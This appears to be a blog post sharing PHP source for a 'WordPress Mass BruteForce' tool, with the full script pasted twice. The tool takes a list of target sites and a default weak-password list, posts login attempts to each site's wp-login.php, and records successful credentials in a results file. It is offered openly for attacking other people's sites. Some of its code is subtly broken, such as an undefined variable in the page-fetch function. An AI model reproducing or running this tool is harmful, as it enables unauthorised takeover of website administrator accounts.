Here Is A Tool For WP Mass BruteForce .. .. ..
PHP CODE:
<?
# Wordpress Mass brute Force Priv8 ^_*
# Coded by Lagrip-dz
# Devloped by Th3 K!LL3r Dz
# Style Leacked By Th3 K!LL3r Dz
echo '<html>
<head>
<link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
<meta name="author" content="Th3 K!LL3r Dz" />
<meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
<meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
<title># Wordpress Mass brute Force #</title>
<style type=\'text/css\'>
input[type=submit], input[type=button], input[type=reset]{
text-align:center;
background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#FFFFFF;
border-top-color:#565656;
padding:4px 6px;
margin:4px 5px;
height:16px;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
text-shadow:0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:23px;
}
input[type=text], input[type=password]{
background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#CCCCCC;
border-top-color:#565656;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:18px;
margin-left: 5px;
}
input , textarea , button , body , caption , table ,area , option {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
//border:1px solid rgba(0,0,0, 0.2);
/* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
}
input , textarea {
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
}
input , textarea {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
border:1px solid rgba(0,0,0, 0.2);
}
input:focus, textarea:focus {
outline: 0;
border-color: rgba(82, 168, 236, 0.8);
-webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
-moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
overflow: auto;
}
.x1 {}
.x2 {font-size:13px;
background-color:green;
color:black;}
hr {color:white;}
a {color:black;}
#x5 {
font-family:tahoma;}
.d1 {color :#C17E0B;
font-family:tahoma;
font-size:13px;
font-weight:bold;}
#d4 {color:#C17E0B;
font-family:tahoma;
font-weight:bold;}
</style>
</head>
</br></br>
<center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
<form method="post" action="" enctype="multipart/form-data">
<table width="50%" border="0">
<tr><td><p ><font class="d1">User :</font>
<input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
</td></tr>
<tr><td><font class="d1">Sites list :</font>
</td><td><font class="d1" >Pass list :</font></td></tr>
<tr><td>
<textarea name="sites" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" cols="20" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
</textarea>
</td></tr><tr><td>
<font >
<input type="submit" name="x" value="start" id="d4">
</font></td></tr></table>
</form></center>' ;
@ set_time_limit ( 0 );
if( $_POST [ 'x' ]){
echo "<hr>" ;
$sites = explode ( "\n" , $_POST [ "sites" ]); // Get Sites By Th3 K!LL3r Dz !
$w0rds = explode ( "\n" , $_POST [ "w0rds" ]); // Get w0rdLiSt By Th3 K!LL3r Dz !
$Attack = new Wordpress_brute_Force (); // Active Class
foreach( $w0rds as $pwd ){
foreach( $sites as $site ){
$Attack -> check_it ( txt_cln ( $site ), $_POST [ 'usr' ], txt_cln ( $pwd )); // Brute :D
flush (); flush ();
}
}
}
# Class & Function'z
function txt_cln ( $value ){ return str_replace (array( "\n" , "\r" ), "" , $value ); }
class Wordpress_brute_Force {
public function check_it ( $site , $user , $pass ){ // print result
if( eregi ( 'profile.php' , $this -> post ( $site , $user , $pass ))){
echo "<span class=\"x2\"><b># Success : $user : $pass -> <a href=' $site /wp-admin/'> $site /wp-admin/</a></b></span><BR>" ;
$f = fopen ( "Wp-Result.txt" , "a+" ); fwrite ( $f , "Success ~~ $user : $pass -> $site /wp-admin/\n" ); fclose ( $f );
flush ();
}else{ echo "# Failed : $user : $pass -> $site <BR>" ; flush ();}
}
public function post ( $site , $user , $pass ){ // Post -> user & pass
$login = $site . '/wp-login.php' ;
$to = $site . '/wp-admin' ;
$token = $this -> extract_token ( $site );
$log = array ( 'Log In' , 'دخول' );
$data = array ( 'log' => $user , 'pwd' => $pass , 'rememberme' => 'forever' , 'wp-submit' => $log , 'redirect_to' => $to , 'testcookie' => 1 );
$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_POST , 1 );
curl_setopt ( $curl , CURLOPT_POSTFIELDS , $data );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );
$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;
}
public function extract_token ( $site ){ // get token from source for -> function post
$source = $this -> get_source ( $site );
preg_match_all ( "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" , $source , $token );
return $token [ 1 ][ 0 ];
}
public function get_source ( $site ){ // get source for -> function extract_token
$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );
$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;
}
}
?>
PHP CODE:
<?
# Wordpress Mass brute Force Priv8 ^_*
# Coded by Lagrip-dz
# Devloped by Th3 K!LL3r Dz
# Style Leacked By Th3 K!LL3r Dz
echo '<html>
<head>
<link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
<meta name="author" content="Th3 K!LL3r Dz" />
<meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
<meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
<title># Wordpress Mass brute Force #</title>
<style type=\'text/css\'>
input[type=submit], input[type=button], input[type=reset]{
text-align:center;
background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#FFFFFF;
border-top-color:#565656;
padding:4px 6px;
margin:4px 5px;
height:16px;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
text-shadow:0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:23px;
}
input[type=text], input[type=password]{
background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
border:1px solid #4D4D4D;
color:#CCCCCC;
border-top-color:#565656;
-moz-box-shadow:0 0 1px black;
-webkit-box-shadow:0 0 1px black;
box-shadow:0 0 1px black;
-moz-border-radius:4px;
-webkit-border-radius:4px;
-khtml-border-radius:4px;
border-radius:4px;
height:18px;
margin-left: 5px;
}
input , textarea , button , body , caption , table ,area , option {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
//border:1px solid rgba(0,0,0, 0.2);
/* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
}
input , textarea {
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
}
input , textarea {
outline:none;
transition: all 0.20s ease-in-out;
-webkit-transition: all 0.25s ease-in-out;
-moz-transition: all 0.25s ease-in-out;
border-radius:3px;
-webkit-border-radius:3px;
-moz-border-radius:3px;
border:1px solid rgba(0,0,0, 0.2);
}
input:focus, textarea:focus {
outline: 0;
border-color: rgba(82, 168, 236, 0.8);
-webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
-moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
overflow: auto;
}
.x1 {}
.x2 {font-size:13px;
background-color:green;
color:black;}
hr {color:white;}
a {color:black;}
#x5 {
font-family:tahoma;}
.d1 {color :#C17E0B;
font-family:tahoma;
font-size:13px;
font-weight:bold;}
#d4 {color:#C17E0B;
font-family:tahoma;
font-weight:bold;}
</style>
</head>
</br></br>
<center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
<form method="post" action="" enctype="multipart/form-data">
<table width="50%" border="0">
<tr><td><p ><font class="d1">User :</font>
<input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
</td></tr>
<tr><td><font class="d1">Sites list :</font>
</td><td><font class="d1" >Pass list :</font></td></tr>
<tr><td>
<textarea name="sites" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" cols="20" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
</textarea>
</td></tr><tr><td>
<font >
<input type="submit" name="x" value="start" id="d4">
</font></td></tr></table>
</form></center>' ;
@ set_time_limit ( 0 );
if( $_POST [ 'x' ]){
echo "<hr>" ;
$sites = explode ( "\n" , $_POST [ "sites" ]); // Get Sites By Th3 K!LL3r Dz !
$w0rds = explode ( "\n" , $_POST [ "w0rds" ]); // Get w0rdLiSt By Th3 K!LL3r Dz !
$Attack = new Wordpress_brute_Force (); // Active Class
foreach( $w0rds as $pwd ){
foreach( $sites as $site ){
$Attack -> check_it ( txt_cln ( $site ), $_POST [ 'usr' ], txt_cln ( $pwd )); // Brute :D
flush (); flush ();
}
}
}
# Class & Function'z
function txt_cln ( $value ){ return str_replace (array( "\n" , "\r" ), "" , $value ); }
class Wordpress_brute_Force {
public function check_it ( $site , $user , $pass ){ // print result
if( eregi ( 'profile.php' , $this -> post ( $site , $user , $pass ))){
echo "<span class=\"x2\"><b># Success : $user : $pass -> <a href=' $site /wp-admin/'> $site /wp-admin/</a></b></span><BR>" ;
$f = fopen ( "Wp-Result.txt" , "a+" ); fwrite ( $f , "Success ~~ $user : $pass -> $site /wp-admin/\n" ); fclose ( $f );
flush ();
}else{ echo "# Failed : $user : $pass -> $site <BR>" ; flush ();}
}
public function post ( $site , $user , $pass ){ // Post -> user & pass
$login = $site . '/wp-login.php' ;
$to = $site . '/wp-admin' ;
$token = $this -> extract_token ( $site );
$log = array ( 'Log In' , 'دخول' );
$data = array ( 'log' => $user , 'pwd' => $pass , 'rememberme' => 'forever' , 'wp-submit' => $log , 'redirect_to' => $to , 'testcookie' => 1 );
$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_POST , 1 );
curl_setopt ( $curl , CURLOPT_POSTFIELDS , $data );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );
$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;
}
public function extract_token ( $site ){ // get token from source for -> function post
$source = $this -> get_source ( $site );
preg_match_all ( "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" , $source , $token );
return $token [ 1 ][ 0 ];
}
public function get_source ( $site ){ // get source for -> function extract_token
$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );
$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;
}
}
?>
0 comments:
Post a Comment